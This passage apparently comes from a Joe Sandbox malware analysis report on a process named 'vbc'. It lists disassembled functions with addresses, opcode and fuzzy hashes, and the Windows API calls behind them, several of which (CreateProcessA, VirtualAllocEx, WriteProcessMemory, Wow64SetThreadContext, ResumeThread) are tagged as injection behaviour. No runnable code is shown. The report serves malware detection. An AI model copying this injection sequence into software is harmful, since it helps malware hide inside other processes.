                                                                                                    • Instruction ID: 455dbf619768337496d7b4663f148d09ae773a24859af4233f19d7037ec0ea63
                                                                                                    • Opcode Fuzzy Hash: f559c7121f4f966e0cbee4ec46a985392e9c2ee264929e8fd3c3f1c07ae3c58f
                                                                                                    • Instruction Fuzzy Hash: 64313C327082545FCB099B6998909EE7FA7EFCA354B45807AFA09CB361DE31CC058751
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052CEB0 Relevance: 2.6, Strings: 2, Instructions: 105COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @P$@P
                                                                                                    • API String ID: 0-921174265
                                                                                                    • Opcode ID: 53ee6a67d0f904584cc1474ab8974f503048f0749558d3be8a16c348d1d96faa
                                                                                                    • Instruction ID: 58efefa7201455c2680827bbb9e10ac632ebee0dc977eddf6f844a9d182eb8aa
                                                                                                    • Opcode Fuzzy Hash: 53ee6a67d0f904584cc1474ab8974f503048f0749558d3be8a16c348d1d96faa
                                                                                                    • Instruction Fuzzy Hash: 43313630B041349F8B22A760A95043E3EDBAFC7710726857AE906CB7C6DE304D0293C6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00EBDD8D Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00EBDFCE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.605364405.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_eb0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
                                                                                                    • Opcode ID: bbd9922c18fe8bdba2f583457f510a032957f28ddc8414fbec618ce786bbfc8d
                                                                                                    • Instruction ID: e1bdfa009b6938a1e142d37bc48e1ebed7a90ea5bccc8177b1325d2ecdcf7c25
                                                                                                    • Opcode Fuzzy Hash: bbd9922c18fe8bdba2f583457f510a032957f28ddc8414fbec618ce786bbfc8d
                                                                                                    • Instruction Fuzzy Hash: D4914971D046198FDB10DFA8CC81BEEBBB2BF44308F158569E819B7280EB749985CF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00EBDD98 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00EBDFCE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.605364405.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_eb0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
                                                                                                    • Opcode ID: 88261feb92916b2a95fd82956c53d3fa3c3ed9d209fcc55c46cd5f139ccd3a7c
                                                                                                    • Instruction ID: 32c2fc45bac1b05631f3b0868e3ad404c750353247602e1539be1199dcd7dd8e
                                                                                                    • Opcode Fuzzy Hash: 88261feb92916b2a95fd82956c53d3fa3c3ed9d209fcc55c46cd5f139ccd3a7c
                                                                                                    • Instruction Fuzzy Hash: 18914971D046198FDB14DFA8CC81BEEBBB2BF44308F148569E819B7280EB749985CF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00E107EC Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 00E108F9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604860241.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_e10000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BaseModuleName
                                                                                                    • String ID:
                                                                                                    • API String ID: 595626670-0
                                                                                                    • Opcode ID: d4addf6d71903c04ebd139495d6ff660ba7e031d0dae803e2aaf5ae4b9d5ef88
                                                                                                    • Instruction ID: 8019a808c11785749fe5bbd7850ddb6abdb2b58ea284c898415762d8566cb18b
                                                                                                    • Opcode Fuzzy Hash: d4addf6d71903c04ebd139495d6ff660ba7e031d0dae803e2aaf5ae4b9d5ef88
                                                                                                    • Instruction Fuzzy Hash: BA412570D047489FDB18CFA9C494BDEBBB1BF88318F148419E819BB291D7B49885CF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00E107F8 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 00E108F9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604860241.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_e10000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BaseModuleName
                                                                                                    • String ID:
                                                                                                    • API String ID: 595626670-0
                                                                                                    • Opcode ID: 98c18268d996bb89d987d238c1f10a50717dcff5cb1870ab8de301302f382a32
                                                                                                    • Instruction ID: 4c669e1839e70188f371061144b8f24e0f5ff861a26964b328c490d21741d082
                                                                                                    • Opcode Fuzzy Hash: 98c18268d996bb89d987d238c1f10a50717dcff5cb1870ab8de301302f382a32
                                                                                                    • Instruction Fuzzy Hash: 37411470D047489FDB18CFA9C895BDEBBB1BF88318F148429E819BB251D7B49885CF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054C170 Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: d
                                                                                                    • API String ID: 0-2564639436
                                                                                                    • Opcode ID: 9c75e00b915b8d2b9f186e11dd614275d83493ce38e1542b9b0a47a1361dcd6d
                                                                                                    • Instruction ID: d6a894ab7f5ab56adcbdf16da9f0bc60971ad08cfa2f1cb569dc7d794975df3e
                                                                                                    • Opcode Fuzzy Hash: 9c75e00b915b8d2b9f186e11dd614275d83493ce38e1542b9b0a47a1361dcd6d
                                                                                                    • Instruction Fuzzy Hash: 95D169356006058FCB24CF28C5949AABBF2FFC8319B16C569D45A9B762DB30FD46CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00EBA6C5 Relevance: 1.6, APIs: 1, Instructions: 88fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CopyFileW.KERNEL32(?,00000000,?), ref: 00EBA781
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.605364405.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_eb0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CopyFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 1304948518-0
                                                                                                    • Opcode ID: 9580bf658909d6eec80f9c4ef73ecc8774af7e911dacb2569b3280c510c38282
                                                                                                    • Instruction ID: df87d36f28ad9f08cd41e909455208d896aa7c8e68762d8b9443143c8c7091bd
                                                                                                    • Opcode Fuzzy Hash: 9580bf658909d6eec80f9c4ef73ecc8774af7e911dacb2569b3280c510c38282
                                                                                                    • Instruction Fuzzy Hash: 49316BB5D052599FCB10CFA9D8847EEFBF0EF88310F19816AD848E7251D7749940CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00EBD4F5 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 00EBF6A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.605364405.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_eb0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumProcesses
                                                                                                    • String ID:
                                                                                                    • API String ID: 84517404-0
                                                                                                    • Opcode ID: 0eeaff686172d3150583640345792b328e9d2597cca3f210e03fc0a798a2e4e9
                                                                                                    • Instruction ID: e2c9b72bc0de59f112e2d332c6be09cc8cb7281a710416bc4b88321ef6390023
                                                                                                    • Opcode Fuzzy Hash: 0eeaff686172d3150583640345792b328e9d2597cca3f210e03fc0a798a2e4e9
                                                                                                    • Instruction Fuzzy Hash: 623167B19093599FCB00CFA9C845BEEFBB4FB49314F05816AE904F7251D3749904CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00EBDBE8 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 00EBDC80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.605364405.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_eb0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: 1c20266a0b557631278a6733db0fd43f51799bc4dc83a8da5e4d4594c83cebed
                                                                                                    • Instruction ID: d1aaf049d23236e0079da373978001bfd611dace2b056b1b72e909ca3f607e56
                                                                                                    • Opcode Fuzzy Hash: 1c20266a0b557631278a6733db0fd43f51799bc4dc83a8da5e4d4594c83cebed
                                                                                                    • Instruction Fuzzy Hash: E72139759043499FCB10CFA9C885BEEBBF0FF88314F14842AE519A7240D7B89954CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00EBA6E8 Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CopyFileW.KERNEL32(?,00000000,?), ref: 00EBA781
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.605364405.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_eb0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CopyFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 1304948518-0
                                                                                                    • Opcode ID: 73377acb1f0ad2aa8c00a70f96290bd1301017f846d621000847090cb52e964f
                                                                                                    • Instruction ID: a4f7b0e770fbeee2f3ce3f1ec3b7b7b2fc93395124ba1bed6159bd190d81051e
                                                                                                    • Opcode Fuzzy Hash: 73377acb1f0ad2aa8c00a70f96290bd1301017f846d621000847090cb52e964f
                                                                                                    • Instruction Fuzzy Hash: C3213BB5D052199FCB50CFA9D8857EEFBF4EF88310F18816AE818B7241D7749A40CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00EBDBF0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 00EBDC80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.605364405.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_eb0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: 950162a56bd4724f94d52567f8f750e1505b2698389fec4fb85e6a902f7b857a
                                                                                                    • Instruction ID: 4160270ef0a908d7dfdeaca278e37ba87709147e6f8327bdb51fcf1e73f8fd13
                                                                                                    • Opcode Fuzzy Hash: 950162a56bd4724f94d52567f8f750e1505b2698389fec4fb85e6a902f7b857a
                                                                                                    • Instruction Fuzzy Hash: 2E21F7719043499FCB10CFA9C885BDEBBF5FF48314F14842AE919A7240D7B89954CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00EBDA50 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00EBDAD6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.605364405.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_eb0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThreadWow64
                                                                                                    • String ID:
                                                                                                    • API String ID: 983334009-0
                                                                                                    • Opcode ID: 69b82f4f471b8231257384738e2f565940ec40822ebac4c620ca94373463a62b
                                                                                                    • Instruction ID: fa63b1b4e5f73874ec8dfc47688446e7c2ca741293e330f60d152ec1a89cf1f9
                                                                                                    • Opcode Fuzzy Hash: 69b82f4f471b8231257384738e2f565940ec40822ebac4c620ca94373463a62b
                                                                                                    • Instruction Fuzzy Hash: E2211471D046499FDB10CFA9C885BEEBBF4AF88318F15842AD419B7240D7B89945CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00EBE1D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00EBE258
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.605364405.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_eb0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1726664587-0
                                                                                                    • Opcode ID: 2db73f26e85e880a871f4dd00d604376e6414cad1a66cc86cc2656793d829402
                                                                                                    • Instruction ID: 7a1142e0851025f2d826e7af90692a3da38482a41201d93dc02973ea9546d540
                                                                                                    • Opcode Fuzzy Hash: 2db73f26e85e880a871f4dd00d604376e6414cad1a66cc86cc2656793d829402
                                                                                                    • Instruction Fuzzy Hash: 2A2128719003499FCB10CFA9C885BEEFBF5FF88314F50842AE519A7250D774A940CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00EBDA58 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00EBDAD6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.605364405.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_eb0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThreadWow64
                                                                                                    • String ID:
                                                                                                    • API String ID: 983334009-0
                                                                                                    • Opcode ID: b64a203b216d1c5e54e67ca58aa52410914dfb4f07d18ef511814cb78b6ce785
                                                                                                    • Instruction ID: aa860ebbb46572370a99f4d740b3ba6ab73f4438048b2a9a5bbff55a5a00900a
                                                                                                    • Opcode Fuzzy Hash: b64a203b216d1c5e54e67ca58aa52410914dfb4f07d18ef511814cb78b6ce785
                                                                                                    • Instruction Fuzzy Hash: 2F2137719042098FDB10CFA9C885BEEBBF4EF88318F14842AD519B7240DB78A944CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00EBE1D1 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00EBE258
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.605364405.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_eb0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1726664587-0
                                                                                                    • Opcode ID: 9a85c3c7aff292faab2108a65c33028cd76f8da46dbbe636afea13ac16440338
                                                                                                    • Instruction ID: 64011106394127212ec015e7605c8c5a0a387f6588c9d0e2c63e57cc14fe9c4a
                                                                                                    • Opcode Fuzzy Hash: 9a85c3c7aff292faab2108a65c33028cd76f8da46dbbe636afea13ac16440338
                                                                                                    • Instruction Fuzzy Hash: BD2136719002499FCB00CFA9C884BEEFBB5FF88314F50842EE518B7250D778A940CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00E11908 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnumChildWindows.USER32(?,00000000,?), ref: 00E11988
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604860241.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_e10000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChildEnumWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 3555792229-0
                                                                                                    • Opcode ID: c51c039617ff572b96f0563f646224a26730176c3cfad330945071dd43e4d30b
                                                                                                    • Instruction ID: fd430280e40e62e5229f861c65ffa700454b870ddc8a3fb7c2be552dac1cf133
                                                                                                    • Opcode Fuzzy Hash: c51c039617ff572b96f0563f646224a26730176c3cfad330945071dd43e4d30b
                                                                                                    • Instruction Fuzzy Hash: 632134B1D046498FDB14CFA9C844BEEFBF5EB88314F14842AD429B3290D778A945CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00E11910 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnumChildWindows.USER32(?,00000000,?), ref: 00E11988
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604860241.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_e10000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChildEnumWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 3555792229-0
                                                                                                    • Opcode ID: 6ad9537f7d3bc3de353ed271d51ece288bd4159aa50b3a51f687e464d85125ff
                                                                                                    • Instruction ID: d0454c82651e52206f2fb8eed532790a65663f45559108922a700d4a5d3c7cfc
                                                                                                    • Opcode Fuzzy Hash: 6ad9537f7d3bc3de353ed271d51ece288bd4159aa50b3a51f687e464d85125ff
                                                                                                    • Instruction Fuzzy Hash: 912115719006098FDB14CFA9C844BEEFBF5EB88314F14842AD529B3290D778A944CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00E10728 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 00E107A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604860241.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_e10000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumModulesProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 1082081703-0
                                                                                                    • Opcode ID: facb731c9b486786ef18b877257e4a33a7690be718042be209237fec684559de
                                                                                                    • Instruction ID: 7a8dccd4b2073b23781b48ae3a39a9beeafd14723a9318402b438a262b38282a
                                                                                                    • Opcode Fuzzy Hash: facb731c9b486786ef18b877257e4a33a7690be718042be209237fec684559de
                                                                                                    • Instruction Fuzzy Hash: FE2129B5D046499FCB10CF99D484BDEBBF0AF88314F15842AE458A7250D7B4A945CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00E10730 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 00E107A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604860241.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_e10000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumModulesProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 1082081703-0
                                                                                                    • Opcode ID: ba1f3abde0281d45b67369182d3cfb6abfe131aa21d5ee9b6cb57e7a74395e1b
                                                                                                    • Instruction ID: cabd1180709c70ab5444eca3a2b2e328d732e0a066a9f84798d566b30b371338
                                                                                                    • Opcode Fuzzy Hash: ba1f3abde0281d45b67369182d3cfb6abfe131aa21d5ee9b6cb57e7a74395e1b
                                                                                                    • Instruction Fuzzy Hash: 0F2108759006499FCB10CF9AC444BDEFBF4FF88314F14842AE558A7240D7B4A944CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00EBDB29 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00EBDB9E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.605364405.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_eb0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: d434eb956d79b6744111c8a4c42fa67d29dc7bb5290a00a142947c7201fa682c
                                                                                                    • Instruction ID: 1d18abdda92e0519536feb40835a9fc2ad95dcba68d2fa33777678e1ed43e6b8
                                                                                                    • Opcode Fuzzy Hash: d434eb956d79b6744111c8a4c42fa67d29dc7bb5290a00a142947c7201fa682c
                                                                                                    • Instruction Fuzzy Hash: F71156719042499FCB10CFA9C844BDFBBF5EF88318F24882AE515A7250DB75A940CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00EBDB30 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00EBDB9E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.605364405.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_eb0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 0cc574cbe499f26c9107e7fcda3a64ddec57339e925b5f81ef0859fc4fbb0ab3
                                                                                                    • Instruction ID: 801a9fde276c77dd5928a6a9c2fcb46571d8a421f90a0715ca58550b2e892a49
                                                                                                    • Opcode Fuzzy Hash: 0cc574cbe499f26c9107e7fcda3a64ddec57339e925b5f81ef0859fc4fbb0ab3
                                                                                                    • Instruction Fuzzy Hash: B21123719042499FCB10CFA9C844BEFBBF5EF88318F14881AE515A7250DBB5A950CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00EBD900 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,DF125800), ref: 00EBD96A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.605364405.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_eb0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: 9756ffb5475ac87a84963e7d2ea642ba3fb9271965c3fbbba3e0021a81c9ded1
                                                                                                    • Instruction ID: 755a17d3bf47dd2f073b4813637e64b62d31441e0026433e6696ffcc5c212391
                                                                                                    • Opcode Fuzzy Hash: 9756ffb5475ac87a84963e7d2ea642ba3fb9271965c3fbbba3e0021a81c9ded1
                                                                                                    • Instruction Fuzzy Hash: 2A114971D046498FDB10CFA9D8457EEFBF4AF88318F24841ED415B7240D7B4A945CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00EBD908 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,DF125800), ref: 00EBD96A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.605364405.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_eb0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: 9d3e4f0f6c7e1640cd6433b164d9c901cc3ead947de2bc59147907c55ac205f2
                                                                                                    • Instruction ID: ba7735febc9c55c6de45093ab33bead431fc34466389286eb31ea32b175bdcc4
                                                                                                    • Opcode Fuzzy Hash: 9d3e4f0f6c7e1640cd6433b164d9c901cc3ead947de2bc59147907c55ac205f2
                                                                                                    • Instruction Fuzzy Hash: 101128719046488BDB10CFA9C8457EFFBF4AF88318F14881AD519B7240DBB5A944CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FF250 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: H+Zl
                                                                                                    • API String ID: 0-1336712802
                                                                                                    • Opcode ID: c9b7d62efc03eeb3e2cc213c3e8d996dba380973724cb9706cb57621fd8e3429
                                                                                                    • Instruction ID: 4f9cb025087d8ba453e616b6c3f3422aa7babd66760bfb2c09a2a2e51bbd6981
                                                                                                    • Opcode Fuzzy Hash: c9b7d62efc03eeb3e2cc213c3e8d996dba380973724cb9706cb57621fd8e3429
                                                                                                    • Instruction Fuzzy Hash: 0A919435B001088FDB05EB68D89567F77F6AFC9304F158179DA02EB399DB349C068B92
                                                                                                    Uniqueness

